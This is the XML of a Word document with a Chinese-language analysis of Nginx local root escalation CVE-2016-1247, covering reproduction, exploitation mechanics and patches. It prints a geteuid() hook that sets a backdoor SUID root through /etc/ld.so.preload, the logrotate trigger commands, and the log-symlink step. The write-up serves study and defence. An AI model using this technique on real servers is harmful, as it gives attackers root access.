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jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Nginx权限提升漏洞(CVE-2016-1247) 分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x00 漏洞概述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1.漏洞简介</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>11月15日，国外安全研究员 Dawid Golunski 公开了一个新的Nginx</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>（CVE-2016-1247），能够影响基于 Debian 系</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>列的发行版，Nginx 作为目前主流的一个多用途服务器，因而其危害还是比较严重的，官方对此漏洞已经进行了修复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2.漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Nginx服务在创建log目录时使用了不安全的权限设置，可造成本地权限提升，恶意攻击者能够借此实现从 nginx/web 的用户权限 www-data 到 root 用户权限的提升。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.影响版本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>下述版本之前均存在此漏洞：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Debian: Nginx1.6.2-5+deb8u3</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Ubuntu 16.04: Nginx1.10.0-0ubuntu0.16.04.3</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Ubuntu 14.04: Nginx1.4.6-1ubuntu3.6</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:t>Ubuntu 16.10: Nginx1.10.1-0ubuntu1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x01 漏洞复现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1.环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>测试环境：Ubuntu 14.04: Nginx1.4.6-1ubuntu3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>PoC详见如下链接，给出的 nginxed-root.sh 脚本在其中的第V部分：</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html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2.漏洞触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>恶意者可通过软链接任意文件来替换日志文件，从而实现提权以获取服务器的 root 权限，执行 PoC 后结果如下图：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"http://blog.knownsec.com/wp-content/uploads/2016/11/5.png"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000750" cy="4486275"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065"/>
            <wp:docPr id="4" name="图片 4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提示要等待，但我们可以通过如下命令进行触发：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="139" w:beforeAutospacing="0" w:after="139" w:afterAutospacing="0" w:line="174" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="13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ONInc4AAAD/AAAADwAAAAAA&#10;AAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQN/fl67kAQAAygMAAA4A&#10;AAAAAAAAAQAgAAAAHQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHM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2825" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-2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"/>
        <w:gridCol w:w="2677"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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26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/usr/sbin/logrotate -vf /etc/logrotate.d/nginx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提权后的结果如下：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"http://blog.knownsec.com/wp-content/uploads/2016/11/6.png"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000750" cy="3933825"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="5" name="图片 5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3.漏洞利用分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>一般来说，如果想要修改函数的功能，最直接的就是对其源码进行更改，但很多情况下我们是无法达成此目标的，这时就可以借助一些hook操作来改变程序的流程，从而实现对函数的修改。在 Linux 系统下，我们可以通过编译一个含相同函数定义的 so 文件并借助/etc/ld.so.preload文件来完成此操作，系统的 loader 代码中会检查是否存在/etc/ld.so.preload 文件，如果存在那么就会加载其中列出的所有 so 文件，它能够实现与 LD_PRELOAD 环境变量相同的功能且限制更少，以此来调用我们定义的函数而非原函数。此方法适用于用户空间的so文件劫持，类似于 Windows 下的 DLL 劫持技术。更进一步，如果我们将此技巧与含有suid的文件结合起来，那么就可以很自然的实现提权操作了，所给的 PoC 就是利用的这个技巧。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>关于 hook 操作，简单来看就是如下的一个执行流程：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"http://blog.knownsec.com/wp-content/uploads/2016/11/7.png"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000750" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1270"/>
            <wp:docPr id="9" name="图片 9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在 PoC 利用中与此相关的 C 代码如下所示，如果将其编译成so文件并把路径写入到/etc/ld.so.preload文件的话，那么可以实现对 geteuid()函数的 hook，在 hook 调用中就能执行我们想要的恶意操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="139" w:beforeAutospacing="0" w:after="139" w:afterAutospacing="0" w:line="174" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="13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ONInc4AAAD/AAAADwAAAAAA&#10;AAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQEKUXx/kAQAAygMAAA4A&#10;AAAAAAAAAQAgAAAAHQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHM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341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"/>
        <w:gridCol w:w="3196"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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#define _GNU_SOURCE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#include &lt;sys/stat.h&gt;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#include &lt;unistd.h&gt;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#include &lt;dlfcn.h&gt;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#include &lt;sys/types.h&gt;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#include &lt;sys/stat.h&gt;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#include &lt;fcntl.h&gt;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/*hook原geteuid()函数*/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uid_t geteuid(void) {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//定义函数指针变量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static uid_t  (*old_geteuid)();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//返回原geteuid()函数的指针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old_geteuid = dlsym(RTLD_NEXT, "geteuid");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//在调用原geteuid()函数的同时执行想要的恶意操作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if ( old_geteuid() == 0 ) {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chown("$BACKDOORPATH", 0, 0);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chmod("$BACKDOORPATH", 04777);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unlink("/etc/ld.so.preload");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return old_geteuid();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我们可以将上述代码编译后来做个简单的测试，结果如下图，观察 nginxrootsh 文件前后属性的变化以及/etc/ld.so.preload文件存在与否可以判断我们的恶意操作是否执行了，很显然 hook 是成功的，和 PoC 相同这里也是通过sudo来触发hook调用。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"http://blog.knownsec.com/wp-content/uploads/2016/11/8.png"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000750" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="1" name="图片 1" descr="IMG_25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接下来我们考虑下如何将内容写进/etc/ld.so.preload文件，也就是本次漏洞的所在，Nginx 在配置 log 文件时采用的不安全权限设置使得我们能很容易的实现此目的，从而实现 www-data 到 root 的权限提升。为了看的更清楚，我们首先将目录/var/log/nginx/下的文件全部删除，再重启下 nginx 服务，最后执行如下两条命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="139" w:beforeAutospacing="0" w:after="139" w:afterAutospacing="0" w:line="174" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="13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ONInc4AAAD/AAAADwAAAAAA&#10;AAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQKadqovkAQAAygMAAA4A&#10;AAAAAAAAAQAgAAAAHQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHM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2930" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-2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"/>
        <w:gridCol w:w="2782"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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27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$ curl http://localhost/ &gt;/dev/null 2&gt;/dev/null</w:t>
            </w:r>
          </w:p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$ /usr/sbin/logrotate -vf /etc/logrotate.d/nginx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此时得到的结果如下图所示：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"http://blog.knownsec.com/wp-content/uploads/2016/11/9.png"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010275" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="6985" b="5715"/>
            <wp:docPr id="8" name="图片 8" descr="IMG_26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可以看到 error.log 文件的属性为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="139" w:beforeAutospacing="0" w:after="139" w:afterAutospacing="0" w:line="174" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="13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ONInc4AAAD/AAAADwAAAAAA&#10;AAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQDvWYjrkAQAAygMAAA4A&#10;AAAAAAAAAQAgAAAAHQEAAGRycy9lMm9Eb2MueG1sUEsFBgAAAAAGAAYAWQEAAHM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3186" w:type="dxa"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:tblInd w:w="-2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"/>
        <w:gridCol w:w="3038"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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29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4" w:lineRule="atLeast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-rw-r--r-- 1 www-data root 0 Nov 18 14:49 error.log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将其软链接到/etc/ld.so.preload 文件就可以了，这里为了简单测试，我们将其软链接到/etc/xxxxxxxxxx，同样需要上述那两条触发命令。从上图中我们看到了成功结果，此时 www-data 用户是可以对/etc/xxxxxxxxxx文件进行写操作的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>至此，我们将这些点结合起来就可以实现对此漏洞的利用了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>0x02 修复方案</w:t>
      </w:r>
    </w:p>
    <w:p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t>Nginx官方已经修复，用户应尽快更新至最新版本。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>详细信息：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Debian 系统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"https://www.debian.org/security/2016/dsa-3701"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https://www.debian.org/security/2016/dsa-3701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"https://security-tracker.debian.org/tracker/CVE-2016-1247"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https://security-tracker.debian.org/tracker/CVE-2016-1247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Ubuntu 系统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"https://www.ubuntu.com/usn/usn-3114-1/"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https://www.ubuntu.com/usn/usn-3114-1/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0x03 参考</w:t>
      </w:r>
    </w:p>
    <w:p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"https://www.seebug.org/vuldb/ssvid-92538" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>https://www.seebug.org/vuldb/ssvid-92538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"https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html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"https://minipli.wordpress.com/2009/07/17/ld_preload-vs-etcld-so-preload/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>https://minipli.wordpress.com/2009/07/17/ld_preload-vs-etcld-so-preload/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"http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
        </w:rPr>
        <w:t>http://fluxius.handgrep.se/2011/10/31/the-magic-of-ld_preload-for-userland-rootkits/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作者：kk | Categories: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"http://blog.knownsec.com/category/research/"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安全研究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| Tags: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0C02"/>
    <w:rsid w:val="DBDF0C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log.knownsec.com/wp-content/uploads/2016/11/6.png" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.knownsec.com/wp-content/uploads/2016/11/6.png" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://blog.knownsec.com/wp-content/uploads/2016/11/5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blog.knownsec.com/wp-content/uploads/2016/11/5.png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http://blog.knownsec.com/wp-content/uploads/2016/11/9.png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blog.knownsec.com/wp-content/uploads/2016/11/9.png" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://blog.knownsec.com/wp-content/uploads/2016/11/8.png" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.knownsec.com/wp-content/uploads/2016/11/8.png" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://blog.knownsec.com/wp-content/uploads/2016/11/7.png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blog.knownsec.com/wp-content/uploads/2016/11/7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2017-07-06T18:59:00Z</dcterms:created>
  <dc:creator>zqw</dc:creator>
  <cp:lastModifiedBy>zqw</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-07-06T19:00:31Z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